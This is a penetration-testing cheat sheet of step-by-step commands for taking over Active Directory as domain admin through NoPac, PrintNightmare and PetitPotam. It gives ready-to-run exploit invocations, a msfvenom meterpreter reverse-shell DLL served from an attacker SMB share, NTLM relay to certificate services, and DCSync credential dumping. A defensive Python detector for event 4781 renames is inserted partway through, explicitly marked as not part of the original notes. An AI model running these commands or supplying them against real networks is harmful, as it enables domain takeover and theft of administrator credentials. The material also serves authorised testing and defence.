# Privilege Escalation to Domain Admin using Known Exploits

## **NoPac**

* NoPac is an intra-domain privilege escalation exploit that allows escalating privileges from any standard user to domain admin level access.
* This exploit path takes advantage of being able to change the SamAccountName of a computer account to that of a Domain Controller.
* The flow of the attack is outlined here: [SecureWorks Blog](https://www.secureworks.com/blog/nopac-a-tale-of-two-vulnerabilities-that-could-end-in-ransomware)

**Exploiting NoPac:**

1. Get the NoPac exploit: `git clone https://github.com/Ridter/noPac.git`
2. Check if target is vulnerable: `sudo python3 scanner.py domain.name/validuser:validpassword -dc-ip 172.16.5.5 -use-ldap`
3. Get a SYSTEM shell as the built-in administrator: `sudo python3 noPac.py DOMAIN.NAME/validuser:validpassword -dc-ip 172.16.5.5 -dc-host DC-NAME -shell --impersonate administrator -use-ldap`
4. Perform DCSync against the built-in administrator: `sudo python3 noPac.py DOMAIN.NAME/validuser:validpassword -dc-ip 172.16.5.5 -dc-host DC-NAME --impersonate administrator -use-ldap -dump -just-dc-user DOMAIN.NAME/administrator`
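A defender-side companion to the steps above, added here and not part of the original notes: a small Python detection that walks parsed Security event 4781 records (account renames) and flags the computer-account rename pattern that NoPac depends on. The simplified field names, the domain controller hostnames and the sample records are assumptions constructed for this example.

```python
from dataclasses import dataclass
from typing import Optional

# Hypothetical domain controller hostnames for this example (assumed, not from the notes).
DC_NAMES = {"DC01", "DC02"}

@dataclass
class Finding:
    record_id: int
    subject: str
    old_name: str
    new_name: str
    reason: str

def check_rename(event: dict, dc_names=DC_NAMES) -> Optional[Finding]:
    """Inspect one Security event 4781 ('The name of an account was changed').
    Flags a computer account (old name ends in '$') renamed to a name without the
    '$' suffix, and any rename whose old or new name collides with a DC hostname;
    the old-name check also catches the rename back to the original name."""
    if event.get("EventID") != 4781:
        return None
    old, new = event["OldName"], event["NewName"]
    reasons = []
    if old.endswith("$") and not new.endswith("$"):
        reasons.append("computer account renamed without trailing '$'")
    if new.rstrip("$").upper() in dc_names:
        reasons.append("new name collides with a domain controller name")
    if old.rstrip("$").upper() in dc_names:
        reasons.append("old name collided with a domain controller name")
    if not reasons:
        return None
    return Finding(event["RecordId"], event["Subject"], old, new, "; ".join(reasons))

def scan(events) -> list:
    # Run check_rename over a sequence of parsed events, keeping only findings.
    return [f for f in (check_rename(e) for e in events) if f is not None]

# Constructed sample records (simplified field names; not real log output).
SAMPLE_EVENTS = [
    {"RecordId": 1, "EventID": 4781, "Subject": "CORP\\jdoe", "OldName": "WKS-JDOE$", "NewName": "DC01"},
    {"RecordId": 2, "EventID": 4781, "Subject": "CORP\\admin", "OldName": "OLDSRV$", "NewName": "NEWSRV$"},
    {"RecordId": 3, "EventID": 4781, "Subject": "CORP\\jdoe", "OldName": "DC01", "NewName": "WKS-JDOE$"},
    {"RecordId": 4, "EventID": 4742, "Subject": "CORP\\admin", "OldName": "-", "NewName": "-"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"record {f.record_id}: {f.subject} renamed {f.old_name} -> {f.new_name} ({f.reason})")
```

Records 1 and 3 are reported (the rename onto the DC name and the rename back); the ordinary server rename and the unrelated 4742 event are not.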

***

## **PrintNightmare**

* Vulnerability found in the Print Spooler service, which runs on all Windows operating systems, that allows for privilege escalation and remote code execution.

**Exploiting PrintNightmare:**

1. Get the exploit: `git clone https://github.com/cube0x0/CVE-2021-1675.git`
2. Install cube0x0's version of impacket:

   ```
   pip3 uninstall impacket
   git clone https://github.com/cube0x0/impacket
   cd impacket
   python3 ./setup.py install
   ```
3. Check if the Windows target has MS-PAR & MS-RPRN exposed:\
   `rpcdump.py @172.16.5.5 | egrep 'MS-RPRN|MS-PAR'`
4. Generate a DLL payload to be used by the exploit to gain a shell session:\
   `msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=local-ip LPORT=anyport -f dll > backupscript.dll`
5. Create an SMB server and host a shared folder (CompData, the share name the exploit command below references) pointing at the directory containing the DLL payload that the exploit will attempt to download:\
   `sudo smbserver.py -smb2support CompData /path/to/dll-directory`
6. Run the exploit:\
   `sudo python3 CVE-2021-1675.py domain.name/validusername:validpassword@DC-IP '\\attacker-ip\CompData\backupscript.dll'`

***

## **PetitPotam**

* PetitPotam is an LSA spoofing vulnerability that allows forcing the domain controller to authenticate against another host using NTLM over port 445.
* This attack allows an unauthenticated user to take over the domain.
* More information about PetitPotam can be found here: [DirkJanm Post](https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/)

**Exploiting PetitPotam:**

1. Start an NTLM relay: `sudo ntlmrelayx.py -debug -smb2support --target http://DOMAIN/URL/to/Certificate/Authority/host --adcs --template DomainController`\
   Note: you can use [certi](https://github.com/zer1t0/certi) to find the location of the CA.
2. Get PetitPotam: `git clone https://github.com/topotam/PetitPotam.git`
3. Run PetitPotam: `python3 PetitPotam.py attacker-ip dc-ip`
4. If it worked, you will find the base64 encoded certificate for the domain controller on the NTLM relay shell.
5. Request a TGT for the domain controller using the certificate (the last argument is the output ccache file): `python3 /PKINITtools/gettgtpkinit.py DOMAIN.NAME/DC-NAME\$ -pfx-base64 <base64 certificate> dc01.ccache`
6. Set the KRB5CCNAME environment variable to the previous output file: `export KRB5CCNAME=dc01.ccache`
7. Perform DCSync using (`-k`) the previous ccache file: `secretsdump.py -just-dc-user DOMAIN.NAME/administrator -k -no-pass DC-NAME.DOMAIN.NAME`
